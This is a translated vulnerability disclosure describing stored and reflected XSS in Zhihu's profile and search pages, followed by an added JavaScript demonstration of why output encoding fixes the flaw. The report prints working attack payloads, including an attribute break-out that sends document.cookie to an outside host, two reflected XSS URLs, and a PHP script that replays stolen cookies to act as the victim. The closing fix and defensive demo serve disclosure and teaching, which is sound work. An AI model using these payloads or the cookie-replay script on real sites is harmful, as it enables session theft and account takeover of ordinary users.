In the profile editor, Zhihu's [one-sentence introduction] field does not filter double quotes (it does filter < and >). The value is rendered inside a `title="..."` attribute, so a `"` closes that attribute and everything after it becomes attacker-controlled attributes on the span, i.e. markup of the form `<span controlled-content></span>`. With a hint from 啤酒@wooyun I finally thought of putting `test" onmousemove="alert(/xss/)` into the one-sentence introduction. Whenever another user views my profile page and moves the mouse over the introduction, the handler fires: stored XSS. I could not find a way to load an external JS file. The original plan was `<span class="xmsw" title="dd" onmousemove=e=document.createElement('script');e.setAttribute('src','1.js');document.body.appendChild(e); id="test">test</span>`, but the server enforces a length limit on the field.
So in the end it comes down to stealing the cookie; everyone knows the drill, so I will not go into detail. Write the following into the introduction: `x"onmouseout=window.location='http://test/test.php?c='+document.cookie//` (the trailing `//` turns the template's own closing `"` into a JavaScript comment, so the handler stays syntactically valid). Final rendered result: `<span class="xmsw" title="x"onmouseout=window.location='http://test/test.php?c='+document.cookie//"> x"onmouseout=window.location='…</span>`
But what good is a stolen cookie? Here is a PHP script as proof; this cookie can do a lot:
<?php
// uc_fopen(): the raw-socket HTTP client helper (from UCenter), used here to replay
// a request to zhihu.com with the stolen cookie attached.
function uc_fopen($url, $post = '', $cookie = '', $limit = 0, $bysocket = FALSE, $ip = '', $timeout = 15, $block = TRUE) {
    $return = '';
    $matches = parse_url($url);
    !isset($matches['host']) && $matches['host'] = '';
    !isset($matches['path']) && $matches['path'] = '';
    !isset($matches['query']) && $matches['query'] = '';
    !isset($matches['port']) && $matches['port'] = '';
    $host = $matches['host'];
    $path = $matches['path'] ? $matches['path'].($matches['query'] ? '?'.$matches['query'] : '') : '/';
    $port = !empty($matches['port']) ? $matches['port'] : 80;
    if($post) {
        // POST: forward the visitor's User-Agent and send a zhihu.com Referer so the
        // request looks like it originated on the site itself
        $out = "POST $path HTTP/1.0\r\n";
        $out .= "Accept: */*\r\n";
        //$out .= "Referer: $boardurl\r\n";
        $out .= "Accept-Language: zh-cn\r\n";
        $out .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $out .= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n";
        $out .= "Host: $host\r\n";
        $out .= "Referer: http://www.zhihu.com/topic/%E7%94%B5%E5%BD%B1\r\n";
        $out .= 'Content-Length: '.strlen($post)."\r\n";
        $out .= "Connection: Close\r\n";
        $out .= "Cache-Control: no-cache\r\n";
        $out .= "Cookie: $cookie\r\n\r\n";
        $out .= $post;
    } else {
        $out = "GET $path HTTP/1.0\r\n";
        $out .= "Accept: */*\r\n";
        //$out .= "Referer: $boardurl\r\n";
        $out .= "Accept-Language: zh-cn\r\n";
        $out .= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n";
        $out .= "Host: $host\r\n";
        $out .= "Connection: Close\r\n";
        $out .= "Cookie: $cookie\r\n\r\n";
    }
    $fp = @fsockopen(($ip ? $ip : $host), $port, $errno, $errstr, $timeout);
    if(!$fp) {
        return ''; //note $errstr : $errno \r\n
    } else {
        stream_set_blocking($fp, $block);
        stream_set_timeout($fp, $timeout);
        @fwrite($fp, $out);
        $status = stream_get_meta_data($fp);
        if(!$status['timed_out']) {
            // skip the response headers up to the first blank line
            while (!feof($fp)) {
                if(($header = @fgets($fp)) && ($header == "\r\n" || $header == "\n")) {
                    break;
                }
            }
            // read the body, honouring $limit if one was given
            $stop = false;
            while(!feof($fp) && !$stop) {
                $data = fread($fp, ($limit == 0 || $limit > 8192 ? 8192 : $limit));
                $return .= $data;
                if($limit) {
                    $limit -= strlen($data);
                    $stop = $limit <= 0;
                }
            }
        }
        @fclose($fp);
        return $return;
    }
}

// the victim's cookie arrives in the query string via the XSS redirect
$cookie = $_GET['c'];
echo $cookie;
// request body of the "follow" action, captured from the site
$data = 'type=people&id=28bb2b6ff09a5072198351434ab2efff&status=1';
$url = 'http://www.zhihu.com/follow';
echo uc_fopen($url, $data, $cookie);
?>

What this PHP script does is add a follow of the yolfilm account. When someone views my profile and a mouse movement triggers the XSS, the browser is redirected to this page, which then uses PHP to follow yolfilm on the victim's behalf. I will not demonstrate the rest; it is enough to find the request for any given action and resubmit it from the PHP script.
Moreover, none of Zhihu's submission endpoints has a CAPTCHA, so requests can be submitted automatically, which makes replaying them from the PHP script all the easier.
Two reflected XSS thrown in as a bonus (the search parameters `pq` and `q` echo a `<script>` payload back into the page): http://www.zhihu.com/people/yolfilm/search?pq=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&type=all http://www.zhihu.com/search?q=%22/%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Fix: filter `"` as well, and entity-encode the value on output for the context it is rendered into (the title attribute and the span's text). Author: possible
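To show why stripping only `<` and `>` leaves the attribute break-out above open, and what the proposed fix (encode on output) changes, here is an added example that is not part of the original report. The `<span class="xmsw" title="...">` template mirrors the rendered markup quoted above; `naiveFilter`, `encodeForAttribute`, the tolerant start-tag attribute parser and the two test payloads are my own constructions, and the parser only models the browser rules that matter here (an attribute name may begin right after a closing quote, and an unquoted value runs to whitespace or `>`).

```javascript
// What the report says Zhihu's filter did: < and > removed, " left untouched.
function naiveFilter(input) {
  return input.replace(/[<>]/g, '');
}

// Attribute-safe encoding: every character that can end a quoted attribute value
// or start a tag or entity becomes an entity, so the value can never leave title="...".
function encodeForAttribute(input) {
  return input
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Profile rendering in the shape the report shows: the introduction lands both in
// the title attribute and as the span's text content.
function renderIntro(intro, sanitize) {
  const safe = sanitize(intro);
  return `<span class="xmsw" title="${safe}">${safe}</span>`;
}

// Minimal, deliberately tolerant start-tag attribute parser (my own, not a browser):
// returns the attribute names of the first tag in document order.
function attributeNames(html) {
  const end = html.indexOf('>');
  const tag = html.slice(html.indexOf('<') + 1, end === -1 ? html.length : end);
  let i = 0;
  while (i < tag.length && !/\s/.test(tag[i])) i++;        // skip the tag name
  const names = [];
  while (i < tag.length) {
    while (i < tag.length && /[\s/]/.test(tag[i])) i++;     // separators
    if (i >= tag.length) break;
    let name = '';
    while (i < tag.length && !/[\s=\/]/.test(tag[i])) name += tag[i++];
    names.push(name.toLowerCase());
    while (i < tag.length && /\s/.test(tag[i])) i++;
    if (tag[i] === '=') {                                    // attribute has a value
      i++;
      while (i < tag.length && /\s/.test(tag[i])) i++;
      const q = tag[i];
      if (q === '"' || q === "'") {                          // quoted: up to matching quote
        const close = tag.indexOf(q, i + 1);
        i = close === -1 ? tag.length : close + 1;
      } else {                                               // unquoted: up to whitespace
        while (i < tag.length && !/\s/.test(tag[i])) i++;
      }
    }
  }
  return names;
}

// Constructed test inputs: the two payloads quoted in the report.
const PAYLOADS = [
  'test" onmousemove="alert(/xss/)',
  "x\"onmouseout=window.location='http://test/test.php?c='+document.cookie//",
];

// Event-handler attributes that survive into the rendered start tag.
function injectedHandlers(intro, sanitize) {
  return attributeNames(renderIntro(intro, sanitize)).filter((n) => n.startsWith('on'));
}

for (const p of PAYLOADS) {
  console.log('naive  :', renderIntro(p, naiveFilter), '->', injectedHandlers(p, naiveFilter));
  console.log('encoded:', renderIntro(p, encodeForAttribute), '->', injectedHandlers(p, encodeForAttribute));
}
```

With the naive filter both payloads yield a span carrying an extra `onmousemove` / `onmouseout` attribute; with attribute encoding the rendered tag has exactly `class` and `title`, and the payload is shown verbatim but inert. Encoding is per context: the same value also goes into the span's text, where the text encoder must cover `<`, `>` and `&`. As an additional hardening beyond the report's fix, a session cookie flagged `HttpOnly` is not readable through `document.cookie`, which would have blunted the exfiltration payload even with the injection in place.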